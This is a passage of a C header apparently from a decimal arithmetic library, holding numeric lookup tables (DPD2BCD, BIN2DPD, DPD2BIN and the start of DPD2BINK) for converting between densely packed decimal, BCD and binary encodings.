0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 0, 0, 0, 0, 0, 0, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 0, 0, 0, 0, 0, 0, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 0, 0, 0, 0, 0, 0, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 0, 0, 0, 0, 0, 0, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 0, 0, 0, 0, 0, 0, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 0, 0, 0, 0, 0, 0, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 0, 0, 0, 0, 0, 0, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 0, 0, 0, 0, 0, 0, 522, 523, 554, 555, 586, 587, 618, 619, 590, 591, 0, 0, 0, 0, 0, 0, 538, 539, 570, 571, 602, 603, 634, 635, 606, 607, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 0, 0, 0, 0, 0, 0, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 0, 0, 0, 0, 0, 0, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 0, 0, 0, 0, 0, 0, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 0, 0, 0, 0, 0, 0, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 0, 0, 0, 0, 0, 0, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 0, 0, 0, 0, 0, 0, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 0, 0, 0, 0, 0, 0, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 0, 0, 0, 0, 0, 0, 650, 651, 682, 683, 714, 715, 746, 747, 718, 719, 0, 0, 0, 0, 0, 0, 666, 667, 698, 699, 730, 731, 762, 763, 734, 735, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 0, 0, 0, 0, 0, 0, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 0, 0, 0, 0, 0, 0, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 0, 0, 0, 0, 0, 0, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 0, 0, 0, 0, 0, 0, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 0, 0, 0, 0, 0, 0, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 0, 0, 0, 0, 0, 0, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 0, 0, 0, 0, 0, 0, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 0, 0, 0, 0, 0, 0, 778, 779, 810, 811, 842, 843, 874, 875, 846, 847, 0, 0, 0, 0, 0, 0, 794, 795, 826, 827, 858, 859, 890, 891, 862, 863, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 0, 0, 0, 0, 0, 0, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 0, 0, 0, 0, 0, 0, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 0, 0, 0, 0, 0, 0, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 0, 0, 0, 0, 0, 0, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 0, 0, 0, 0, 0, 0, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 0, 0, 0, 0, 0, 0, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 0, 0, 0, 0, 0, 0, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 0, 0, 0, 0, 0, 0, 906, 907, 938, 939, 970, 971, 1002, 1003, 974, 975, 0, 0, 0, 0, 0, 0, 922, 923, 954, 955, 986, 987, 1018, 1019, 990, 991, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 13, 268, 269, 524, 525, 780, 781, 46, 47, 0, 0, 0, 0, 0, 0, 28, 29, 284, 285, 540, 541, 796, 797, 62, 63, 0, 0, 0, 0, 0, 0, 44, 45, 300, 301, 556, 557, 812, 813, 302, 303, 0, 0, 0, 0, 0, 0, 60, 61, 316, 317, 572, 573, 828, 829, 318, 319, 0, 0, 0, 0, 0, 0, 76, 77, 332, 333, 588, 589, 844, 845, 558, 559, 0, 0, 0, 0, 0, 0, 92, 93, 348, 349, 604, 605, 860, 861, 574, 575, 0, 0, 0, 0, 0, 0, 108, 109, 364, 365, 620, 621, 876, 877, 814, 815, 0, 0, 0, 0, 0, 0, 124, 125, 380, 381, 636, 637, 892, 893, 830, 831, 0, 0, 0, 0, 0, 0, 14, 15, 270, 271, 526, 527, 782, 783, 110, 111, 0, 0, 0, 0, 0, 0, 30, 31, 286, 287, 542, 543, 798, 799, 126, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 140, 141, 396, 397, 652, 653, 908, 909, 174, 175, 0, 0, 0, 0, 0, 0, 156, 157, 412, 413, 668, 669, 924, 925, 190, 191, 0, 0, 0, 0, 0, 0, 172, 173, 428, 429, 684, 685, 940, 941, 430, 431, 0, 0, 0, 0, 0, 0, 188, 189, 444, 445, 700, 701, 956, 957, 446, 447, 0, 0, 0, 0, 0, 0, 204, 205, 460, 461, 716, 717, 972, 973, 686, 687, 0, 0, 0, 0, 0, 0, 220, 221, 476, 477, 732, 733, 988, 989, 702, 703, 0, 0, 0, 0, 0, 0, 236, 237, 492, 493, 748, 749, 1004, 1005, 942, 943, 0, 0, 0, 0, 0, 0, 252, 253, 508, 509, 764, 765, 1020, 1021, 958, 959, 0, 0, 0, 0, 0, 0, 142, 143, 398, 399, 654, 655, 910, 911, 238, 239, 0, 0, 0, 0, 0, 0, 158, 159, 414, 415, 670, 671, 926, 927, 254, 255}; #endif #if defined(DEC_DPD2BCD) && DEC_DPD2BCD==1 && !defined(DECDPD2BCD) #define DECDPD2BCD const uint16_t DPD2BCD[1024]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 128, 129, 2048, 2049, 2176, 2177, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 144, 145, 2064, 2065, 2192, 2193, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 130, 131, 2080, 2081, 2056, 2057, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 146, 147, 2096, 2097, 2072, 2073, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 132, 133, 2112, 2113, 136, 137, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 148, 149, 2128, 2129, 152, 153, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 134, 135, 2144, 2145, 2184, 2185, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 150, 151, 2160, 2161, 2200, 2201, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 384, 385, 2304, 2305, 2432, 2433, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 400, 401, 2320, 2321, 2448, 2449, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 386, 387, 2336, 2337, 2312, 2313, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 402, 403, 2352, 2353, 2328, 2329, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 388, 389, 2368, 2369, 392, 393, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 404, 405, 2384, 2385, 408, 409, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 390, 391, 2400, 2401, 2440, 2441, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 406, 407, 2416, 2417, 2456, 2457, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 640, 641, 2050, 2051, 2178, 2179, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 656, 657, 2066, 2067, 2194, 2195, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 642, 643, 2082, 2083, 2088, 2089, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 658, 659, 2098, 2099, 2104, 2105, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 644, 645, 2114, 2115, 648, 649, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 660, 661, 2130, 2131, 664, 665, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 646, 647, 2146, 2147, 2184, 2185, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 662, 663, 2162, 2163, 2200, 2201, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 896, 897, 2306, 2307, 2434, 2435, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 912, 913, 2322, 2323, 2450, 2451, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 898, 899, 2338, 2339, 2344, 2345, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 914, 915, 2354, 2355, 2360, 2361, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 900, 901, 2370, 2371, 904, 905, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 916, 917, 2386, 2387, 920, 921, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 902, 903, 2402, 2403, 2440, 2441, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 918, 919, 2418, 2419, 2456, 2457, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1152, 1153, 2052, 2053, 2180, 2181, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1168, 1169, 2068, 2069, 2196, 2197, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1154, 1155, 2084, 2085, 2120, 2121, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1170, 1171, 2100, 2101, 2136, 2137, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1156, 1157, 2116, 2117, 1160, 1161, 1104, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1172, 1173, 2132, 2133, 1176, 1177, 1120, 1121, 1122, 1123, 1124, 1125, 1126, 1127, 1128, 1129, 1158, 1159, 2148, 2149, 2184, 2185, 1136, 1137, 1138, 1139, 1140, 1141, 1142, 1143, 1144, 1145, 1174, 1175, 2164, 2165, 2200, 2201, 1280, 1281, 1282, 1283, 1284, 1285, 1286, 1287, 1288, 1289, 1408, 1409, 2308, 2309, 2436, 2437, 1296, 1297, 1298, 1299, 1300, 1301, 1302, 1303, 1304, 1305, 1424, 1425, 2324, 2325, 2452, 2453, 1312, 1313, 1314, 1315, 1316, 1317, 1318, 1319, 1320, 1321, 1410, 1411, 2340, 2341, 2376, 2377, 1328, 1329, 1330, 1331, 1332, 1333, 1334, 1335, 1336, 1337, 1426, 1427, 2356, 2357, 2392, 2393, 1344, 1345, 1346, 1347, 1348, 1349, 1350, 1351, 1352, 1353, 1412, 1413, 2372, 2373, 1416, 1417, 1360, 1361, 1362, 1363, 1364, 1365, 1366, 1367, 1368, 1369, 1428, 1429, 2388, 2389, 1432, 1433, 1376, 1377, 1378, 1379, 1380, 1381, 1382, 1383, 1384, 1385, 1414, 1415, 2404, 2405, 2440, 2441, 1392, 1393, 1394, 1395, 1396, 1397, 1398, 1399, 1400, 1401, 1430, 1431, 2420, 2421, 2456, 2457, 1536, 1537, 1538, 1539, 1540, 1541, 1542, 1543, 1544, 1545, 1664, 1665, 2054, 2055, 2182, 2183, 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559, 1560, 1561, 1680, 1681, 2070, 2071, 2198, 2199, 1568, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1666, 1667, 2086, 2087, 2152, 2153, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1682, 1683, 2102, 2103, 2168, 2169, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1668, 1669, 2118, 2119, 1672, 1673, 1616, 1617, 1618, 1619, 1620, 1621, 1622, 1623, 1624, 1625, 1684, 1685, 2134, 2135, 1688, 1689, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 1670, 1671, 2150, 2151, 2184, 2185, 1648, 1649, 1650, 1651, 1652, 1653, 1654, 1655, 1656, 1657, 1686, 1687, 2166, 2167, 2200, 2201, 1792, 1793, 1794, 1795, 1796, 1797, 1798, 1799, 1800, 1801, 1920, 1921, 2310, 2311, 2438, 2439, 1808, 1809, 1810, 1811, 1812, 1813, 1814, 1815, 1816, 1817, 1936, 1937, 2326, 2327, 2454, 2455, 1824, 1825, 1826, 1827, 1828, 1829, 1830, 1831, 1832, 1833, 1922, 1923, 2342, 2343, 2408, 2409, 1840, 1841, 1842, 1843, 1844, 1845, 1846, 1847, 1848, 1849, 1938, 1939, 2358, 2359, 2424, 2425, 1856, 1857, 1858, 1859, 1860, 1861, 1862, 1863, 1864, 1865, 1924, 1925, 2374, 2375, 1928, 1929, 1872, 1873, 1874, 1875, 1876, 1877, 1878, 1879, 1880, 1881, 1940, 1941, 2390, 2391, 1944, 1945, 1888, 1889, 1890, 1891, 1892, 1893, 1894, 1895, 1896, 1897, 1926, 1927, 2406, 2407, 2440, 2441, 1904, 1905, 1906, 1907, 1908, 1909, 1910, 1911, 1912, 1913, 1942, 1943, 2422, 2423, 2456, 2457}; #endif #if defined(DEC_BIN2DPD) && DEC_BIN2DPD==1 && !defined(DECBIN2DPD) #define DECBIN2DPD const uint16_t BIN2DPD[1000]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 10, 11, 42, 43, 74, 75, 106, 107, 78, 79, 26, 27, 58, 59, 90, 91, 122, 123, 94, 95, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 138, 139, 170, 171, 202, 203, 234, 235, 206, 207, 154, 155, 186, 187, 218, 219, 250, 251, 222, 223, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 266, 267, 298, 299, 330, 331, 362, 363, 334, 335, 282, 283, 314, 315, 346, 347, 378, 379, 350, 351, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 394, 395, 426, 427, 458, 459, 490, 491, 462, 463, 410, 411, 442, 443, 474, 475, 506, 507, 478, 479, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 522, 523, 554, 555, 586, 587, 618, 619, 590, 591, 538, 539, 570, 571, 602, 603, 634, 635, 606, 607, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 650, 651, 682, 683, 714, 715, 746, 747, 718, 719, 666, 667, 698, 699, 730, 731, 762, 763, 734, 735, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 778, 779, 810, 811, 842, 843, 874, 875, 846, 847, 794, 795, 826, 827, 858, 859, 890, 891, 862, 863, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 906, 907, 938, 939, 970, 971, 1002, 1003, 974, 975, 922, 923, 954, 955, 986, 987, 1018, 1019, 990, 991, 12, 13, 268, 269, 524, 525, 780, 781, 46, 47, 28, 29, 284, 285, 540, 541, 796, 797, 62, 63, 44, 45, 300, 301, 556, 557, 812, 813, 302, 303, 60, 61, 316, 317, 572, 573, 828, 829, 318, 319, 76, 77, 332, 333, 588, 589, 844, 845, 558, 559, 92, 93, 348, 349, 604, 605, 860, 861, 574, 575, 108, 109, 364, 365, 620, 621, 876, 877, 814, 815, 124, 125, 380, 381, 636, 637, 892, 893, 830, 831, 14, 15, 270, 271, 526, 527, 782, 783, 110, 111, 30, 31, 286, 287, 542, 543, 798, 799, 126, 127, 140, 141, 396, 397, 652, 653, 908, 909, 174, 175, 156, 157, 412, 413, 668, 669, 924, 925, 190, 191, 172, 173, 428, 429, 684, 685, 940, 941, 430, 431, 188, 189, 444, 445, 700, 701, 956, 957, 446, 447, 204, 205, 460, 461, 716, 717, 972, 973, 686, 687, 220, 221, 476, 477, 732, 733, 988, 989, 702, 703, 236, 237, 492, 493, 748, 749, 1004, 1005, 942, 943, 252, 253, 508, 509, 764, 765, 1020, 1021, 958, 959, 142, 143, 398, 399, 654, 655, 910, 911, 238, 239, 158, 159, 414, 415, 670, 671, 926, 927, 254, 255}; #endif #if defined(DEC_DPD2BIN) && DEC_DPD2BIN==1 && !defined(DECDPD2BIN) #define DECDPD2BIN const uint16_t DPD2BIN[1024]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 80, 81, 800, 801, 880, 881, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 90, 91, 810, 811, 890, 891, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 82, 83, 820, 821, 808, 809, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 92, 93, 830, 831, 818, 819, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 84, 85, 840, 841, 88, 89, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 94, 95, 850, 851, 98, 99, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 86, 87, 860, 861, 888, 889, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 96, 97, 870, 871, 898, 899, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 180, 181, 900, 901, 980, 981, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 190, 191, 910, 911, 990, 991, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 182, 183, 920, 921, 908, 909, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 192, 193, 930, 931, 918, 919, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 184, 185, 940, 941, 188, 189, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 194, 195, 950, 951, 198, 199, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 186, 187, 960, 961, 988, 989, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 196, 197, 970, 971, 998, 999, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 280, 281, 802, 803, 882, 883, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 290, 291, 812, 813, 892, 893, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 282, 283, 822, 823, 828, 829, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 292, 293, 832, 833, 838, 839, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 284, 285, 842, 843, 288, 289, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 294, 295, 852, 853, 298, 299, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 286, 287, 862, 863, 888, 889, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 296, 297, 872, 873, 898, 899, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 380, 381, 902, 903, 982, 983, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 390, 391, 912, 913, 992, 993, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 382, 383, 922, 923, 928, 929, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 392, 393, 932, 933, 938, 939, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 384, 385, 942, 943, 388, 389, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 394, 395, 952, 953, 398, 399, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 386, 387, 962, 963, 988, 989, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 396, 397, 972, 973, 998, 999, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 480, 481, 804, 805, 884, 885, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 490, 491, 814, 815, 894, 895, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 482, 483, 824, 825, 848, 849, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 492, 493, 834, 835, 858, 859, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 484, 485, 844, 845, 488, 489, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 494, 495, 854, 855, 498, 499, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 486, 487, 864, 865, 888, 889, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 496, 497, 874, 875, 898, 899, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 580, 581, 904, 905, 984, 985, 510, 511, 512, 513, 514, 515, 516, 517, 518, 519, 590, 591, 914, 915, 994, 995, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 582, 583, 924, 925, 948, 949, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 592, 593, 934, 935, 958, 959, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 584, 585, 944, 945, 588, 589, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 594, 595, 954, 955, 598, 599, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 586, 587, 964, 965, 988, 989, 570, 571, 572, 573, 574, 575, 576, 577, 578, 579, 596, 597, 974, 975, 998, 999, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 680, 681, 806, 807, 886, 887, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 690, 691, 816, 817, 896, 897, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 682, 683, 826, 827, 868, 869, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 692, 693, 836, 837, 878, 879, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 684, 685, 846, 847, 688, 689, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 694, 695, 856, 857, 698, 699, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 686, 687, 866, 867, 888, 889, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 696, 697, 876, 877, 898, 899, 700, 701, 702, 703, 704, 705, 706, 707, 708, 709, 780, 781, 906, 907, 986, 987, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 790, 791, 916, 917, 996, 997, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 782, 783, 926, 927, 968, 969, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 792, 793, 936, 937, 978, 979, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 784, 785, 946, 947, 788, 789, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 794, 795, 956, 957, 798, 799, 760, 761, 762, 763, 764, 765, 766, 767, 768, 769, 786, 787, 966, 967, 988, 989, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 796, 797, 976, 977, 998, 999}; #endif #if defined(DEC_DPD2BINK) && DEC_DPD2BINK==1 && !defined(DECDPD2BINK) #define DECDPD2BINK const uint32_t DPD2BINK[1024]={ 0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 80000, 81000, 800000, 801000, 880000, 881000, 10000, 11000, 12000, 13000, 14000, 15000, 16000, 17000, 18000, 19000, 90000, 91000, 810000, 811000, 890000, 891000, 20000, 21000, 22000, 23000, 24000, 25000, 26000, 27000, 28000, 29000, 82000, 83000, 820000, 821000, 808000, 809000, 30000, 31000, 32000, 33000, 34000, 35000, 36000, 37000, 38000, 39000, 92000, 93000, 830000, 831000, 818000, 819000, 40000, 41000, 